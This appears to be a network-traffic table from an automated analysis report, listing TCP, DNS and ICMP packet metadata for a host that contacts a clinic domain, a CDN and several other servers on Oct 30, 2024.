                                                                                                      Oct 30, 2024 17:13:38.602813959 CET44349981192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:38.645145893 CET49981443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:38.751807928 CET44349982192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:38.752180099 CET49982443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:38.752197027 CET44349982192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:38.753578901 CET44349982192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:38.753667116 CET49982443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:38.753948927 CET49982443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:38.754014969 CET44349982192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:38.754163027 CET49982443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:38.754172087 CET44349982192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:38.757899046 CET44349983192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:38.758104086 CET49983443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:38.758115053 CET44349983192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:38.759146929 CET44349983192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:38.759244919 CET49983443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:38.759577036 CET49983443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:38.759645939 CET44349983192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:38.786650896 CET44349981192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:38.786772013 CET44349981192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:38.786845922 CET44349981192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:38.786844969 CET49981443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:38.786883116 CET49981443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:38.787628889 CET49981443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:38.787641048 CET44349981192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:38.803117990 CET49983443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:38.803129911 CET44349983192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:38.803186893 CET49982443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:38.848120928 CET49983443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:38.943156958 CET44349982192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:38.943186998 CET44349982192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:38.943763971 CET44349982192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:38.943794012 CET49982443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:38.943814993 CET49982443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:38.944727898 CET49982443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:38.944742918 CET44349982192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:38.989326954 CET49983443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:39.035339117 CET44349983192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:39.149912119 CET44349983192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:39.150046110 CET44349983192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:39.150122881 CET49983443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:39.152028084 CET49983443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:39.152060986 CET44349983192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:41.647978067 CET49984443192.168.2.16142.250.184.228
                                                                                                      Oct 30, 2024 17:13:41.648037910 CET44349984142.250.184.228192.168.2.16
                                                                                                      Oct 30, 2024 17:13:41.648108006 CET49984443192.168.2.16142.250.184.228
                                                                                                      Oct 30, 2024 17:13:41.648313046 CET49984443192.168.2.16142.250.184.228
                                                                                                      Oct 30, 2024 17:13:41.648329020 CET44349984142.250.184.228192.168.2.16
                                                                                                      Oct 30, 2024 17:13:41.983309984 CET49985443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:41.983365059 CET44349985192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:41.983452082 CET49985443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:41.983699083 CET49985443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:41.983714104 CET44349985192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:41.984563112 CET49986443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:41.984591961 CET44349986192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:41.984894991 CET49986443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:41.985186100 CET49986443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:41.985198975 CET44349986192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:42.514235020 CET44349984142.250.184.228192.168.2.16
                                                                                                      Oct 30, 2024 17:13:42.514591932 CET49984443192.168.2.16142.250.184.228
                                                                                                      Oct 30, 2024 17:13:42.514611006 CET44349984142.250.184.228192.168.2.16
                                                                                                      Oct 30, 2024 17:13:42.515722990 CET44349984142.250.184.228192.168.2.16
                                                                                                      Oct 30, 2024 17:13:42.515818119 CET49984443192.168.2.16142.250.184.228
                                                                                                      Oct 30, 2024 17:13:42.516834021 CET49984443192.168.2.16142.250.184.228
                                                                                                      Oct 30, 2024 17:13:42.516895056 CET44349984142.250.184.228192.168.2.16
                                                                                                      Oct 30, 2024 17:13:42.559118986 CET49984443192.168.2.16142.250.184.228
                                                                                                      Oct 30, 2024 17:13:42.559139013 CET44349984142.250.184.228192.168.2.16
                                                                                                      Oct 30, 2024 17:13:42.607115030 CET49984443192.168.2.16142.250.184.228
                                                                                                      Oct 30, 2024 17:13:42.658005953 CET44349985192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:42.658330917 CET49985443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:42.658346891 CET44349985192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:42.658679008 CET44349985192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:42.659033060 CET49985443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:42.659106016 CET44349985192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:42.659197092 CET49985443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:42.688355923 CET44349986192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:42.688699007 CET49986443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:42.688709974 CET44349986192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:42.689060926 CET44349986192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:42.689393997 CET49986443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:42.689470053 CET44349986192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:42.703336000 CET44349985192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:42.735105991 CET49986443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:42.866045952 CET44349985192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:42.866103888 CET44349985192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:42.866187096 CET49985443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:42.867255926 CET49985443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:42.867275000 CET44349985192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:48.494340897 CET50003443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:48.494359970 CET4435000313.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:48.494630098 CET50003443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:48.494630098 CET50003443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:48.494652987 CET4435000313.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:49.254291058 CET4435000313.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:49.254604101 CET50003443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:49.254616976 CET4435000313.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:49.255727053 CET4435000313.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:49.255820036 CET50003443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:49.256800890 CET50003443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:49.256870031 CET4435000313.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:49.256974936 CET50003443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:49.256983042 CET4435000313.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:49.307113886 CET50003443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:49.438204050 CET4435000313.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:49.438280106 CET4435000313.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:49.438324928 CET50003443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:49.439048052 CET50003443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:49.439057112 CET4435000313.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:49.768490076 CET50030443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:49.768532991 CET4435003013.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:49.768646002 CET50030443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:49.769005060 CET50030443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:49.769020081 CET4435003013.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:50.539401054 CET4435003013.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:50.539684057 CET50030443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:50.539702892 CET4435003013.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:50.540563107 CET4435003013.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:50.540615082 CET50030443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:50.541883945 CET50030443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:50.541932106 CET4435003013.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:50.542090893 CET50030443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:50.542099953 CET4435003013.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:50.596064091 CET50030443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:50.798630953 CET4435003013.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:50.798651934 CET4435003013.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:50.798659086 CET4435003013.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:50.798686981 CET4435003013.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:50.798701048 CET4435003013.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:50.798710108 CET4435003013.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:50.798748016 CET50030443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:50.798763990 CET4435003013.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:50.798818111 CET50030443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:50.801172018 CET4435003013.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:50.801187992 CET4435003013.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:50.801260948 CET50030443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:50.801276922 CET4435003013.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:50.801311970 CET50030443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:50.921113014 CET4435003013.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:50.921144009 CET4435003013.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:50.921189070 CET4435003013.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:50.921224117 CET50030443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:50.921257019 CET4435003013.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:50.921272993 CET4435003013.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:50.921276093 CET50030443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:50.921324968 CET50030443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:50.925087929 CET50030443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:50.925120115 CET4435003013.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:50.957312107 CET50042443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:50.957338095 CET4435004213.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:50.957444906 CET50042443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:50.959276915 CET50042443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:50.959289074 CET4435004213.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:51.685878992 CET4435004213.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:51.686208963 CET50042443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:51.686216116 CET4435004213.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:51.687145948 CET4435004213.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:51.687213898 CET50042443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:51.687550068 CET50042443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:51.687617064 CET4435004213.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:51.687751055 CET50042443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:51.687756062 CET4435004213.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:51.738251925 CET50042443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:51.929596901 CET4435004213.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:51.929619074 CET4435004213.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:51.929626942 CET4435004213.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:51.929657936 CET4435004213.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:51.929691076 CET4435004213.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:51.929759979 CET50042443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:51.929768085 CET4435004213.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:51.929778099 CET50042443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:51.929812908 CET50042443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:51.936180115 CET4435004213.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:51.936206102 CET4435004213.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:51.936258078 CET50042443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:51.936264038 CET4435004213.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:51.936274052 CET50042443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:51.936315060 CET50042443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:52.047498941 CET4435004213.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:52.047527075 CET4435004213.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:52.047683001 CET50042443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:52.047689915 CET4435004213.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:52.047736883 CET50042443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:52.047764063 CET4435004213.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:52.047811031 CET50042443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:52.047813892 CET4435004213.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:52.047835112 CET4435004213.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:52.047873974 CET50042443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:52.048290014 CET50042443192.168.2.1613.107.246.45
                                                                                                      Oct 30, 2024 17:13:52.048305988 CET4435004213.107.246.45192.168.2.16
                                                                                                      Oct 30, 2024 17:13:52.518060923 CET44349984142.250.184.228192.168.2.16
                                                                                                      Oct 30, 2024 17:13:52.518120050 CET44349984142.250.184.228192.168.2.16
                                                                                                      Oct 30, 2024 17:13:52.518186092 CET49984443192.168.2.16142.250.184.228
                                                                                                      Oct 30, 2024 17:13:52.720237970 CET49984443192.168.2.16142.250.184.228
                                                                                                      Oct 30, 2024 17:13:52.720268965 CET44349984142.250.184.228192.168.2.16
                                                                                                      Oct 30, 2024 17:13:53.478034973 CET44349986192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:53.478111982 CET44349986192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:13:53.478173018 CET49986443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:53.843206882 CET49986443192.168.2.16192.243.110.5
                                                                                                      Oct 30, 2024 17:13:53.843235016 CET44349986192.243.110.5192.168.2.16
                                                                                                      Oct 30, 2024 17:14:23.659301996 CET4970180192.168.2.16192.229.221.95
                                                                                                      Oct 30, 2024 17:14:23.659306049 CET49699443192.168.2.1620.190.159.0
                                                                                                      Oct 30, 2024 17:14:23.665345907 CET8049701192.229.221.95192.168.2.16
                                                                                                      Oct 30, 2024 17:14:23.665416956 CET4970180192.168.2.16192.229.221.95
                                                                                                      Oct 30, 2024 17:14:23.666388988 CET4434969920.190.159.0192.168.2.16
                                                                                                      Oct 30, 2024 17:14:23.666440964 CET49699443192.168.2.1620.190.159.0
                                                                                                      Oct 30, 2024 17:14:26.905257940 CET49702443192.168.2.1620.190.159.0
                                                                                                      Oct 30, 2024 17:14:26.921575069 CET4434970220.190.159.0192.168.2.16
                                                                                                      Oct 30, 2024 17:14:26.921705008 CET49702443192.168.2.1620.190.159.0
                                                                                                      Oct 30, 2024 17:14:41.701237917 CET50106443192.168.2.16142.250.184.228
                                                                                                      Oct 30, 2024 17:14:41.701299906 CET44350106142.250.184.228192.168.2.16
                                                                                                      Oct 30, 2024 17:14:41.701407909 CET50106443192.168.2.16142.250.184.228
                                                                                                      Oct 30, 2024 17:14:41.701652050 CET50106443192.168.2.16142.250.184.228
                                                                                                      Oct 30, 2024 17:14:41.701673031 CET44350106142.250.184.228192.168.2.16
                                                                                                      Oct 30, 2024 17:14:42.550836086 CET44350106142.250.184.228192.168.2.16
                                                                                                      Oct 30, 2024 17:14:42.551238060 CET50106443192.168.2.16142.250.184.228
                                                                                                      Oct 30, 2024 17:14:42.551287889 CET44350106142.250.184.228192.168.2.16
                                                                                                      Oct 30, 2024 17:14:42.551664114 CET44350106142.250.184.228192.168.2.16
                                                                                                      Oct 30, 2024 17:14:42.551981926 CET50106443192.168.2.16142.250.184.228
                                                                                                      Oct 30, 2024 17:14:42.552057981 CET44350106142.250.184.228192.168.2.16
                                                                                                      Oct 30, 2024 17:14:42.592082024 CET50106443192.168.2.16142.250.184.228
                                                                                                      Oct 30, 2024 17:14:52.565130949 CET44350106142.250.184.228192.168.2.16
                                                                                                      Oct 30, 2024 17:14:52.565346956 CET44350106142.250.184.228192.168.2.16
                                                                                                      Oct 30, 2024 17:14:52.565403938 CET50106443192.168.2.16142.250.184.228
                                                                                                      Oct 30, 2024 17:14:53.070621014 CET50106443192.168.2.16142.250.184.228
                                                                                                      Oct 30, 2024 17:14:53.070655107 CET44350106142.250.184.228192.168.2.16
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Oct 30, 2024 17:12:47.933701038 CET53519941.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:12:47.949496984 CET53607581.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:12:48.052326918 CET6373253192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:12:48.052551031 CET6545253192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:12:48.073528051 CET53654521.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:12:48.096328020 CET53637321.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:12:49.098002911 CET5358753192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:12:49.098140001 CET5860653192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:12:49.099528074 CET5927153192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:12:49.099673033 CET5145853192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:12:49.105448961 CET53535871.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:12:49.106563091 CET53586061.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:12:49.138318062 CET53592711.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:12:49.140310049 CET53514581.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:12:49.196449995 CET53507061.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:12:50.262693882 CET6347053192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:12:50.262911081 CET6058553192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:12:50.270425081 CET53605851.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:12:50.271126986 CET53634701.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:12:50.401957035 CET6036453192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:12:50.402234077 CET6305153192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:12:50.419894934 CET53603641.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:12:50.440738916 CET53630511.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:12:52.749440908 CET6201953192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:12:52.749593973 CET6068053192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:12:52.757896900 CET53606801.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:12:52.757922888 CET53620191.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:13:06.235619068 CET53559931.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:13:13.103528023 CET5101853192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:13:13.103858948 CET5059053192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:13:19.350775957 CET53504521.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:13:19.359827042 CET53519561.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:13:19.418461084 CET6441453192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:13:19.418607950 CET6154453192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:13:19.455379009 CET53615441.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:13:19.455775023 CET53644141.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:13:20.351061106 CET6000253192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:13:20.351216078 CET6320753192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:13:20.367726088 CET53632071.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:13:20.392030954 CET53600021.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:13:20.458379984 CET5077753192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:13:20.458959103 CET6134653192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:13:20.474522114 CET53507771.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:13:20.517307043 CET53613461.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:13:20.593453884 CET53553161.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:13:24.140088081 CET6502353192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:13:24.140228033 CET5920253192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:13:24.148910999 CET53592021.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:13:24.148926973 CET53650231.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:13:32.712974072 CET5741553192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:13:32.713115931 CET5479353192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:13:36.918680906 CET53580511.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:13:36.939522982 CET53584781.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:13:36.994033098 CET6264953192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:13:36.994179010 CET5010953192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:13:37.010539055 CET53626491.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:13:37.030863047 CET53501091.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:13:37.898210049 CET5427353192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:13:37.898504972 CET5221553192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:13:37.909898996 CET53542731.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:13:37.935753107 CET53522151.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:13:38.020158052 CET5342253192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:13:38.020329952 CET6162353192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:13:38.059787989 CET53616231.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:13:38.078140020 CET53534221.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:13:38.226872921 CET53587141.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:13:41.638493061 CET6480053192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:13:41.639211893 CET5679453192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:13:41.646064043 CET53648001.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:13:41.647111893 CET53567941.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:13:48.257632971 CET5472553192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:13:48.257792950 CET5572953192.168.2.161.1.1.1
                                                                                                      Oct 30, 2024 17:13:49.155184031 CET138138192.168.2.16192.168.2.255
                                                                                                      Oct 30, 2024 17:13:55.276568890 CET53611451.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:14:14.161007881 CET53559791.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:14:36.899279118 CET53578041.1.1.1192.168.2.16
                                                                                                      Oct 30, 2024 17:14:36.961903095 CET53624921.1.1.1192.168.2.16
                                                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                                                      Oct 30, 2024 17:12:50.440866947 CET192.168.2.161.1.1.1c23c(Port unreachable)Destination Unreachable
                                                                                                      Oct 30, 2024 17:12:55.534702063 CET192.168.2.161.1.1.1c26c(Port unreachable)Destination Unreachable
                                                                                                      Oct 30, 2024 17:13:19.351556063 CET192.168.2.161.1.1.1c23f(Port unreachable)Destination Unreachable
                                                                                                      Oct 30, 2024 17:13:20.517410994 CET192.168.2.161.1.1.1c23c(Port unreachable)Destination Unreachable
                                                                                                      Oct 30, 2024 17:13:25.468760967 CET192.168.2.161.1.1.1c26c(Port unreachable)Destination Unreachable
                                                                                                      Oct 30, 2024 17:13:37.030987978 CET192.168.2.161.1.1.1c23c(Port unreachable)Destination Unreachable
                                                                                                      Oct 30, 2024 17:13:37.935813904 CET192.168.2.161.1.1.1c23c(Port unreachable)Destination Unreachable
                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Oct 30, 2024 17:12:48.052326918 CET192.168.2.161.1.1.10x700eStandard query (0)clinicaaryal.comA (IP address)IN (0x0001)false
                                                                                                      Oct 30, 2024 17:12:48.052551031 CET192.168.2.161.1.1.10xeda5Standard query (0)clinicaaryal.com65IN (0x0001)false
                                                                                                      Oct 30, 2024 17:12:49.098002911 CET192.168.2.161.1.1.10x2256Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                      Oct 30, 2024 17:12:49.098140001 CET192.168.2.161.1.1.10x1904Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
